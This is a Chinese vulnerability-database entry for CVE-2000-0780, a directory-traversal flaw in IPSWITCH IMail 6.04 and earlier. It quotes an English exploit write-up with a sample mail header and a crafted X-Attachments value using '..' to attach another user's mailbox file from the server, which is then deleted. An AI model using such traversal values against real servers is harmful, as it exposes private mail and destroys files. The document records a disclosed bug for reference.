IPSWITCH IMail web服务器漏洞

IPSWITCH IMail web服务器漏洞

漏洞ID 1105981 漏洞类型 未知
发布时间 2000-08-30 更新时间 2005-05-02
图片[1]-IPSWITCH IMail web服务器漏洞-安全小百科CVE编号 CVE-2000-0780
图片[2]-IPSWITCH IMail web服务器漏洞-安全小百科CNNVD-ID CNNVD-200010-093
漏洞平台 Windows CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/20182
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-093
|漏洞详情
IPSWITCHIMail6.04及其早期版本的web服务器存在漏洞。远程攻击者可以借助..(点点)攻击读取和删除任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/1617/info

IPSWITCH ships a product titled IMail, an email server for usage on NT servers serving clients their mail via a web interface. To this end the IMail server provides a web server typically running on port 8383 for it's end users to access. Via this interface users may read and send mail, as well as mail with file attachments. Certain versions of IMail do not perform proper access validation however resulting in users being able to attach files resident on the server. The net result of this is users may attach files on the server to which they should have no access. This access is limited to the user privileges which the server is being run as, typically SYSTEM.

It should be noted that once a user attachs the files in question the server deletes them.

Here is a sample mail header sent by IMAIL web services which
has an attachment. Please note that this is line wrapped for readability.

Date: Tue, 11 Jul 2000 13:10:28 +0200
Message-ID: <[email protected]>
MIME-Version: 1.0 Content-Type: multipart/mixed; 
boundary="==IMail_v5.0==" 
From: "Timescape" <[email protected]>
Reply-To: <[email protected]> 
To: <[email protected]>
Subject: test
X-Mailer: <IMail v5.01> 
X-Attachments: D:IMAILspoolgonzo2.jpg ;
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 
Return-Path: <[email protected]> 
X-OriginalArrivalTime: 11 Jul 2000 11:20:48.0256 (UTC) FILETIME=[10327800:01BFEB2A]

This is a multi-part message in MIME format.

--==IMail_v5.0==
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

--==IMail_v5.0==
Content-Type: application/octet-stream;
name="gonzo2.jpg "
Content-Transfer-Encoding: base64

--==IMail_v5.0==--

The thing which we will be exploiting is the
X-Attachments: D:IMAILspoolgonzo2.jpg ;

I made it work by modifing the compose message HTML file and
saved it locally. Then i can just arrange the path to the
attachment so that it can read

X-Attachments: D:IMAILspool..barusersadminmain.mbx ;
|参考资料

来源:BID
名称:1617
链接:http://www.securityfocus.com/bid/1617
来源:www.ipswitch.com
链接:http://www.ipswitch.com/Support/IMail/news.html
来源:BUGTRAQ
名称:20000830VulnerabilityReportOnIPSWITCH’sIMail
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=96767207207553&w;=2

相关推荐: Exim Pipe Hostname Arbitrary Command Execution Vulnerability

Exim Pipe Hostname Arbitrary Command Execution Vulnerability 漏洞ID 1102662 漏洞类型 Input Validation Error 发布时间 2001-12-19 更新时间 2001-12…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享